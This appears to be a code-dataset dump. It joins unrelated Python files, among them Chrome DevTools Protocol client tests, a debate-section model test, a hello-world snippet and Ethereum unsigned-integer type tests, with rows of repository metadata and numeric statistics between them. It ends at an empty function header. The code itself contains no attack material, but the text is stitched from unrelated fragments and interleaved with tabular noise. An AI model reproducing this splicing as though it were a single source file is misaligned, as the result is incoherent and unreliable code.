class TestCDPClientConnectionFailsNoChrome:
@pytest.mark.asyncio
async def test_cdp_client_fails_with_nothing_to_connect_to(self):
with pytest.raises(ClientConnectorError):
await CDP.client()
@pytest.mark.asyncio
async def test_cdp_client_fails_supplied_ws_url_bad(self):
with pytest.raises(Exception):
await CDP.client(target="ws://nope")
@pytest.mark.asyncio
async def test_cdp_ws_connection_fails_with_nothing_to_connect_to(self):
with pytest.raises(ClientConnectorError):
await CDP.ws_connection()
@pytest.mark.asyncio
async def test_cdp_ws_connection_fails_supplied_ws_url_bad(self):
with pytest.raises(Exception):
await CDP.ws_connection(target="ws://nope")
@pytest.mark.usefixtures("chrome")
class TestCDPClientCreation:
@pytest.mark.asyncio
async def test_cdp_client_connects_using_defaults(self, mr_clean: Cleaner):
client = await CDP.client()
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_defaults_remote(self, mr_clean: Cleaner):
client = await CDP.client(remote=True)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_ws_url(self, mr_clean: Cleaner):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
client = await CDP.client(target=ws_url)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_relative_ws_url(self, mr_clean: Cleaner):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
client = await CDP.client(target=ws_url[ws_url.index("/dev") :])
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_target_id(self, mr_clean: Cleaner):
target_id = await get_target_from_list("id")
assert target_id is not None
client = await CDP.client(target=target_id)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_target_dict(self, mr_clean: Cleaner):
the_target = await get_target_from_list("target")
assert the_target is not None
client = await CDP.client(target=the_target)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_http_url(
self, mr_clean: Cleaner
):
client = await CDP.client(target="http://localhost:9222")
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_http_url_remote(
self, mr_clean: Cleaner
):
client = await CDP.client(target="http://localhost:9222", remote=True)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_function_remote_protocol_fetch(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
client = await CDP.client(target=fn, remote=True)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
client, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await client.dispose()
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_function_pregen_protocol(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
client = await CDP.client(target=fn)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
client, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await client.dispose()
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_function_supplied_protocol(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
proto = await CDP.Protocol()
client = await CDP.client(target=fn, protocol=proto)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
client, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await client.dispose()
@pytest.mark.usefixtures("chrome")
class TestCDPWSConnectionCreation:
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_defaults(self, mr_clean: Cleaner):
connection = await CDP.ws_connection()
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_ws_url(self, mr_clean: Cleaner):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
connection = await CDP.ws_connection(target=ws_url)
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_relative_ws_url(
self, mr_clean: Cleaner
):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
connection = await CDP.ws_connection(target=ws_url[ws_url.index("/dev") :])
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_target_id(self, mr_clean: Cleaner):
target_id = await get_target_from_list("id")
assert target_id is not None
connection = await CDP.ws_connection(target=target_id)
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_target_dict(
self, mr_clean: Cleaner
):
the_target = await get_target_from_list("target")
assert the_target is not None
connection = await CDP.ws_connection(target=the_target)
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_supplied_target_http_url(
self, mr_clean: Cleaner
):
connection = await CDP.ws_connection(target="http://localhost:9222")
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_supplied_target_function(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
connection = await CDP.ws_connection(target=fn)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
connection, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await connection.dispose()
FRONT_END_URLS: List[Optional[str]] = [None, "http://localhost:9222"]
FRONT_END_URLS_IDS: List[str] = ["using defaults", "using supplied HTTP url"]
@pytest.mark.usefixtures("chrome")
class TestFontEndFns:
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_list_targets(self, frontend_url: Any):
if frontend_url is not None:
targets = await CDP.List(frontend_url=frontend_url)
else:
targets = await CDP.List()
page_listed = False
for target in targets:
if target["type"] == "page":
page_listed = True
break
assert page_listed
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_retrieve_version(self, frontend_url: Any):
if frontend_url is not None:
version = await CDP.Version(frontend_url=frontend_url)
else:
version = await CDP.Version()
assert version["Browser"] in version["User-Agent"]
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_retrieve_protocol_descriptor(self, frontend_url: Any):
if frontend_url is not None:
version = await CDP.Version(frontend_url=frontend_url)
proto_descriptor = await CDP.Protocol(frontend_url=frontend_url)
else:
version = await CDP.Version()
proto_descriptor = await CDP.Protocol()
pv = proto_descriptor["version"]
major, minor = version["Protocol-Version"].split(".")
assert pv["major"] == major
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_create_activate_and_close_a_target(self, frontend_url: Any):
nt_url = "http://example.com"
if frontend_url is not None:
new_target = await CDP.New(frontend_url=frontend_url, url=nt_url)
else:
new_target = await CDP.New(url=nt_url)
assert new_target["id"] is not None
if frontend_url is not None:
targets = await CDP.List(frontend_url=frontend_url)
else:
targets = await CDP.List()
target_listed = False
for target in targets:
if target["id"] == new_target["id"]:
target_listed = True
break
assert target_listed
if frontend_url is not None:
activate_results = await CDP.Activate(
frontend_url=frontend_url, target_id=new_target["id"]
)
close_results = await CDP.Close(
frontend_url=frontend_url, target_id=new_target["id"]
)
else:
activate_results = await CDP.Activate(target_id=new_target["id"])
close_results = await CDP.Close(target_id=new_target["id"])
assert activate_results == (200, "Target activated")
assert close_results == (200, "Target is closing")
| 40.559105 | 92 | 0.6846 | 1,561 | 12,695 | 5.306855 | 0.085202 | 0.037663 | 0.053356 | 0.069049 | 0.863955 | 0.821463 | 0.802994 | 0.797924 | 0.771608 | 0.716079 | 0 | 0.002221 | 0.219772 | 12,695 | 312 | 93 | 40.689103 | 0.834124 | 0 | 0 | 0.612319 | 0 | 0 | 0.082001 | 0 | 0 | 0 | 0 | 0 | 0.148551 | 1 | 0 | false | 0 | 0.018116 | 0 | 0.032609 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0c60b430658f8a889372b49543aaca0ad1c3d0a6 | 115 | py | Python | Pytest/helloWord.py | qingaoti/Trainer | 9a585e962f9a0315f187ba468d3d180103fb58c8 | [
"MIT"
] | null | null | null | Pytest/helloWord.py | qingaoti/Trainer | 9a585e962f9a0315f187ba468d3d180103fb58c8 | [
"MIT"
] | 1 | 2020-07-16T07:25:39.000Z | 2020-07-16T07:25:39.000Z | Pytest/helloWord.py | qingaoti/Trainer | 9a585e962f9a0315f187ba468d3d180103fb58c8 | [
"MIT"
] | null | null | null | if True:
print ("Answer")
print ("True")
else:
print ("Answer")
print ("False") # 缩进不一致,会导致运行错误
| 16.428571 | 38 | 0.547826 | 13 | 115 | 4.846154 | 0.615385 | 0.349206 | 0.507937 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.278261 | 115 | 6 | 39 | 19.166667 | 0.759036 | 0.113043 | 0 | 0.333333 | 0 | 0 | 0.21 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
a747b6a9eb571fc2a36dc140373076dd8bc46f0f | 2,568 | py | Python | test/models/test_debate_section.py | RobertLucey/oireachtas-data | bb61ce4ce0c24e5e783a1549bfb3d62d4daebf8a | [
"Unlicense"
] | null | null | null | test/models/test_debate_section.py | RobertLucey/oireachtas-data | bb61ce4ce0c24e5e783a1549bfb3d62d4daebf8a | [
"Unlicense"
] | null | null | null | test/models/test_debate_section.py | RobertLucey/oireachtas-data | bb61ce4ce0c24e5e783a1549bfb3d62d4daebf8a | [
"Unlicense"
] | null | null | null | from unittest import TestCase
from oireachtas_data.models.debate_section import DebateSection
class DebateSectionTest(TestCase):
def test_parse(self):
self.assertEqual(
DebateSection.parse(
{
'bill': None,
'contains_debate': True,
'counts': {
'speakerCount': 1,
'speechCount': 1
},
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'data_uri': 'https://something123919230192.com',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': [],
'loaded': False
}
).serialize(),
{
'bill': None,
'contains_debate': True,
'counts': {'speakerCount': 1, 'speechCount': 1},
'data_uri': 'https://something123919230192.com',
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': []
}
)
def test_serialize(self):
self.assertEqual(
DebateSection(
**{
'bill': None,
'contains_debate': True,
'counts': {
'speakerCount': 1,
'speechCount': 1
},
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'data_uri': 'https://something123919230192.com',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': [],
'loaded': False
}
).serialize(),
{
'bill': None,
'contains_debate': True,
'counts': {'speakerCount': 1, 'speechCount': 1},
'data_uri': 'https://something123919230192.com',
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': []
}
)
| 34.24 | 68 | 0.402259 | 164 | 2,568 | 6.054878 | 0.256098 | 0.117825 | 0.064451 | 0.08862 | 0.789527 | 0.789527 | 0.789527 | 0.789527 | 0.789527 | 0.789527 | 0 | 0.047868 | 0.479361 | 2,568 | 74 | 69 | 34.702703 | 0.694839 | 0 | 0 | 0.724638 | 0 | 0 | 0.292835 | 0.03271 | 0 | 0 | 0 | 0 | 0.028986 | 1 | 0.028986 | false | 0 | 0.028986 | 0 | 0.072464 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a7846ebcba7c2b2159caf826896ea9466edef6c8 | 29 | py | Python | temp.py | RAVURISREESAIHARIKRISHNA/Python-2.7.12-3.5.2- | b2626a5a9bd5630dfadba252bbc00760597fe304 | [
"MIT"
] | null | null | null | temp.py | RAVURISREESAIHARIKRISHNA/Python-2.7.12-3.5.2- | b2626a5a9bd5630dfadba252bbc00760597fe304 | [
"MIT"
] | null | null | null | temp.py | RAVURISREESAIHARIKRISHNA/Python-2.7.12-3.5.2- | b2626a5a9bd5630dfadba252bbc00760597fe304 | [
"MIT"
] | null | null | null | print("Hello Python 3.5.2")
| 14.5 | 28 | 0.655172 | 6 | 29 | 3.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12 | 0.137931 | 29 | 1 | 29 | 29 | 0.64 | 0 | 0 | 0 | 0 | 0 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
a788b85b90b2b23ce90907b9eca2223525ba028b | 30 | py | Python | src/test_lib/__init__.py | abood293/razan | bc6b54a876322ff9c547822b2cbeda09cec68d3d | [
"MIT"
] | null | null | null | src/test_lib/__init__.py | abood293/razan | bc6b54a876322ff9c547822b2cbeda09cec68d3d | [
"MIT"
] | null | null | null | src/test_lib/__init__.py | abood293/razan | bc6b54a876322ff9c547822b2cbeda09cec68d3d | [
"MIT"
] | null | null | null | from .my_class import MyClass
| 15 | 29 | 0.833333 | 5 | 30 | 4.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
38f02c40e54585ac0fe95bfb3257f9f1cb9814ee | 61 | py | Python | forty/views/__init__.py | vikian050194/forty | 7ef68fb06bb22a3008351c5a651eaa46b635d433 | [
"MIT"
] | null | null | null | forty/views/__init__.py | vikian050194/forty | 7ef68fb06bb22a3008351c5a651eaa46b635d433 | [
"MIT"
] | 7 | 2021-03-15T17:18:36.000Z | 2021-04-26T09:40:53.000Z | forty/views/__init__.py | vikian050194/forty | 7ef68fb06bb22a3008351c5a651eaa46b635d433 | [
"MIT"
] | null | null | null | from .base import *
from .log import *
from .status import *
| 15.25 | 21 | 0.704918 | 9 | 61 | 4.777778 | 0.555556 | 0.465116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196721 | 61 | 3 | 22 | 20.333333 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ac490843e04a622fb8d85b61543e7f697865c321 | 28,331 | py | Python | tests/test_base_types.py | fulldecent/eth1.0-specs | ab60d58c443515cbcc362673a5994b6bbcc4fb8a | [
"CC0-1.0"
] | 1 | 2021-09-07T21:30:14.000Z | 2021-09-07T21:30:14.000Z | tests/test_base_types.py | fulldecent/eth1.0-specs | ab60d58c443515cbcc362673a5994b6bbcc4fb8a | [
"CC0-1.0"
] | 1 | 2022-02-24T22:44:32.000Z | 2022-02-24T22:44:32.000Z | tests/test_base_types.py | fulldecent/eth1.0-specs | ab60d58c443515cbcc362673a5994b6bbcc4fb8a | [
"CC0-1.0"
] | 1 | 2022-03-20T16:56:51.000Z | 2022-03-20T16:56:51.000Z | import pytest
from ethereum.base_types import U256, U256_MAX_VALUE, Uint
def test_uint_new() -> None:
value = Uint(5)
assert isinstance(value, int)
assert isinstance(value, Uint)
assert value == 5
def test_uint_new_negative() -> None:
with pytest.raises(ValueError):
Uint(-5)
def test_uint_new_float() -> None:
with pytest.raises(TypeError):
Uint(0.1) # type: ignore
def test_uint_radd() -> None:
value = 4 + Uint(5)
assert isinstance(value, Uint)
assert value == 9
def test_uint_radd_negative() -> None:
with pytest.raises(ValueError):
(-4) + Uint(5)
def test_uint_radd_float() -> None:
value = (1.0) + Uint(5)
assert not isinstance(value, int)
assert value == 6.0
def test_uint_add() -> None:
value = Uint(5) + 4
assert isinstance(value, Uint)
assert value == 9
def test_uint_add_negative() -> None:
with pytest.raises(ValueError):
Uint(5) + (-4)
def test_uint_add_float() -> None:
value = Uint(5) + (1.0)
assert not isinstance(value, int)
assert value == 6.0
def test_uint_iadd() -> None:
value = Uint(5)
value += 4
assert isinstance(value, Uint)
assert value == 9
def test_uint_iadd_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value += -4
def test_uint_iadd_float() -> None:
value = Uint(5)
value += 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 6.0
def test_uint_rsub() -> None:
value = 6 - Uint(5)
assert isinstance(value, Uint)
assert value == 1
def test_uint_rsub_too_big() -> None:
with pytest.raises(ValueError):
6 - Uint(7)
def test_uint_rsub_negative() -> None:
with pytest.raises(ValueError):
(-4) - Uint(5)
def test_uint_rsub_float() -> None:
value = (6.0) - Uint(5)
assert not isinstance(value, int)
assert value == 1.0
def test_uint_sub() -> None:
value = Uint(5) - 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_sub_too_big() -> None:
with pytest.raises(ValueError):
Uint(5) - 6
def test_uint_sub_negative() -> None:
with pytest.raises(ValueError):
Uint(5) - (-4)
def test_uint_sub_float() -> None:
value = Uint(5) - (1.0)
assert not isinstance(value, int)
assert value == 4.0
def test_uint_isub() -> None:
value = Uint(5)
value -= 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_isub_too_big() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value -= 6
def test_uint_isub_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value -= -4
def test_uint_isub_float() -> None:
value = Uint(5)
value -= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 4.0
def test_uint_rmul() -> None:
value = 4 * Uint(5)
assert isinstance(value, Uint)
assert value == 20
def test_uint_rmul_negative() -> None:
with pytest.raises(ValueError):
(-4) * Uint(5)
def test_uint_rmul_float() -> None:
value = (1.0) * Uint(5)
assert not isinstance(value, int)
assert value == 5.0
def test_uint_mul() -> None:
value = Uint(5) * 4
assert isinstance(value, Uint)
assert value == 20
def test_uint_mul_negative() -> None:
with pytest.raises(ValueError):
Uint(5) * (-4)
def test_uint_mul_float() -> None:
value = Uint(5) * (1.0)
assert not isinstance(value, int)
assert value == 5.0
def test_uint_imul() -> None:
value = Uint(5)
value *= 4
assert isinstance(value, Uint)
assert value == 20
def test_uint_imul_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value *= -4
def test_uint_imul_float() -> None:
value = Uint(5)
value *= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 5.0
def test_uint_floordiv() -> None:
value = Uint(5) // 2
assert isinstance(value, Uint)
assert value == 2
def test_uint_floordiv_negative() -> None:
with pytest.raises(ValueError):
Uint(5) // -2
def test_uint_floordiv_float() -> None:
value = Uint(5) // 2.0
assert not isinstance(value, Uint)
assert value == 2
def test_uint_rfloordiv() -> None:
value = 5 // Uint(2)
assert isinstance(value, Uint)
assert value == 2
def test_uint_rfloordiv_negative() -> None:
with pytest.raises(ValueError):
(-2) // Uint(5)
def test_uint_rfloordiv_float() -> None:
value = 5.0 // Uint(2)
assert not isinstance(value, Uint)
assert value == 2
def test_uint_ifloordiv() -> None:
value = Uint(5)
value //= 2
assert isinstance(value, Uint)
assert value == 2
def test_uint_ifloordiv_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value //= -2
def test_uint_rmod() -> None:
value = 6 % Uint(5)
assert isinstance(value, Uint)
assert value == 1
def test_uint_rmod_negative() -> None:
with pytest.raises(ValueError):
(-4) % Uint(5)
def test_uint_rmod_float() -> None:
value = (6.0) % Uint(5)
assert not isinstance(value, int)
assert value == 1.0
def test_uint_mod() -> None:
value = Uint(5) % 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_mod_negative() -> None:
with pytest.raises(ValueError):
Uint(5) % (-4)
def test_uint_mod_float() -> None:
value = Uint(5) % (1.0)
assert not isinstance(value, int)
assert value == 0.0
def test_uint_imod() -> None:
value = Uint(5)
value %= 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_imod_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value %= -4
def test_uint_imod_float() -> None:
value = Uint(5)
value %= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 0.0
def test_uint_divmod() -> None:
quotient, remainder = divmod(Uint(5), 2)
assert isinstance(quotient, Uint)
assert isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_divmod_negative() -> None:
with pytest.raises(ValueError):
divmod(Uint(5), -2)
def test_uint_divmod_float() -> None:
quotient, remainder = divmod(Uint(5), 2.0)
assert not isinstance(quotient, Uint)
assert not isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_rdivmod() -> None:
quotient, remainder = divmod(5, Uint(2))
assert isinstance(quotient, Uint)
assert isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_rdivmod_negative() -> None:
with pytest.raises(ValueError):
divmod(-5, Uint(2))
def test_uint_rdivmod_float() -> None:
quotient, remainder = divmod(5.0, Uint(2))
assert not isinstance(quotient, Uint)
assert not isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_pow() -> None:
value = Uint(3) ** 2
assert isinstance(value, Uint)
assert value == 9
def test_uint_pow_negative() -> None:
with pytest.raises(ValueError):
Uint(3) ** -2
def test_uint_pow_modulo() -> None:
value = pow(Uint(4), 2, 3)
assert isinstance(value, Uint)
assert value == 1
def test_uint_pow_modulo_negative() -> None:
with pytest.raises(ValueError):
pow(Uint(4), 2, -3)
def test_uint_rpow() -> None:
value = 3 ** Uint(2)
assert isinstance(value, Uint)
assert value == 9
def test_uint_rpow_negative() -> None:
with pytest.raises(ValueError):
(-3) ** Uint(2)
def test_uint_rpow_modulo() -> None:
value = Uint.__rpow__(Uint(2), 4, 3)
assert isinstance(value, int)
assert value == 1
def test_uint_rpow_modulo_negative() -> None:
with pytest.raises(ValueError):
Uint.__rpow__(Uint(2), 4, -3)
def test_uint_ipow() -> None:
value = Uint(3)
value **= 2
assert isinstance(value, Uint)
assert value == 9
def test_uint_ipow_negative() -> None:
value = Uint(3)
with pytest.raises(ValueError):
value **= -2
def test_uint_ipow_modulo() -> None:
value = Uint(4).__ipow__(2, 3)
assert isinstance(value, Uint)
assert value == 1
def test_uint_ipow_modulo_negative() -> None:
with pytest.raises(ValueError):
Uint(4).__ipow__(2, -3)
def test_uint_to_be_bytes_zero() -> None:
encoded = Uint(0).to_be_bytes()
assert encoded == bytes([])
def test_uint_to_be_bytes_one() -> None:
encoded = Uint(1).to_be_bytes()
assert encoded == bytes([1])
def test_uint_to_be_bytes_is_big_endian() -> None:
encoded = Uint(0xABCD).to_be_bytes()
assert encoded == bytes([0xAB, 0xCD])
def test_uint_to_be_bytes32_zero() -> None:
encoded = Uint(0).to_be_bytes32()
assert encoded == bytes([0] * 32)
def test_uint_to_be_bytes32_one() -> None:
encoded = Uint(1).to_be_bytes32()
assert encoded == bytes([0] * 31 + [1])
def test_uint_to_be_bytes32_max_value() -> None:
encoded = Uint(2 ** 256 - 1).to_be_bytes32()
assert encoded == bytes(
[
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
]
)
def test_uint_from_be_bytes_empty() -> None:
value = Uint.from_be_bytes(b"")
assert value == 0
def test_uint_from_be_bytes_one() -> None:
value = Uint.from_be_bytes(bytes([1]))
assert value == 1
def test_uint_from_be_bytes_is_big_endian() -> None:
value = Uint.from_be_bytes(bytes([0xAB, 0xCD]))
assert value == 0xABCD
def test_u256_new() -> None:
value = U256(5)
assert isinstance(value, int)
assert isinstance(value, U256)
assert value == 5
def test_u256_new_negative() -> None:
with pytest.raises(ValueError):
U256(-5)
def test_u256_new_float() -> None:
with pytest.raises(TypeError):
U256(0.1) # type: ignore
def test_u256_new_max_value() -> None:
value = U256(2 ** 256 - 1)
assert isinstance(value, U256)
assert value == 2 ** 256 - 1
def test_u256_new_too_large() -> None:
with pytest.raises(ValueError):
U256(2 ** 256)
def test_u256_radd() -> None:
value = 4 + U256(5)
assert isinstance(value, U256)
assert value == 9
def test_u256_radd_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256 - 1) + U256(5)
def test_u256_radd_negative() -> None:
with pytest.raises(ValueError):
(-4) + U256(5)
def test_u256_radd_float() -> None:
value = (1.0) + U256(5)
assert not isinstance(value, int)
assert value == 6.0
def test_u256_add() -> None:
value = U256(5) + 4
assert isinstance(value, U256)
assert value == 9
def test_u256_add_overflow() -> None:
with pytest.raises(ValueError):
U256(5) + (2 ** 256 - 1)
def test_u256_add_negative() -> None:
with pytest.raises(ValueError):
U256(5) + (-4)
def test_u256_add_float() -> None:
value = U256(5) + (1.0)
assert not isinstance(value, int)
assert value == 6.0
def test_u256_wrapping_add() -> None:
value = U256(5).wrapping_add(4)
assert isinstance(value, U256)
assert value == 9
def test_u256_wrapping_add_overflow() -> None:
value = U256(5).wrapping_add(2 ** 256 - 1)
assert isinstance(value, U256)
assert value == 4
def test_u256_wrapping_add_negative() -> None:
with pytest.raises(ValueError):
U256(5).wrapping_add(-4)
def test_u256_iadd() -> None:
value = U256(5)
value += 4
assert isinstance(value, U256)
assert value == 9
def test_u256_iadd_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value += -4
def test_u256_iadd_float() -> None:
value = U256(5)
value += 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 6.0
def test_u256_iadd_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value += 2 ** 256 - 1
def test_u256_rsub() -> None:
value = 5 - U256(4)
assert isinstance(value, U256)
assert value == 1
def test_u256_rsub_underflow() -> None:
with pytest.raises(ValueError):
(0) - U256(1)
def test_u256_rsub_negative() -> None:
with pytest.raises(ValueError):
(-4) - U256(5)
def test_u256_rsub_float() -> None:
value = (5.0) - U256(1)
assert not isinstance(value, int)
assert value == 4.0
def test_u256_sub() -> None:
value = U256(5) - 4
assert isinstance(value, U256)
assert value == 1
def test_u256_sub_underflow() -> None:
with pytest.raises(ValueError):
U256(5) - 6
def test_u256_sub_negative() -> None:
with pytest.raises(ValueError):
U256(5) - (-4)
def test_u256_sub_float() -> None:
value = U256(5) - (1.0)
assert not isinstance(value, int)
assert value == 4.0
def test_u256_wrapping_sub() -> None:
value = U256(5).wrapping_sub(4)
assert isinstance(value, U256)
assert value == 1
def test_u256_wrapping_sub_underflow() -> None:
value = U256(5).wrapping_sub(6)
assert isinstance(value, U256)
assert value == 2 ** 256 - 1
def test_u256_wrapping_sub_negative() -> None:
with pytest.raises(ValueError):
U256(5).wrapping_sub(-4)
def test_u256_isub() -> None:
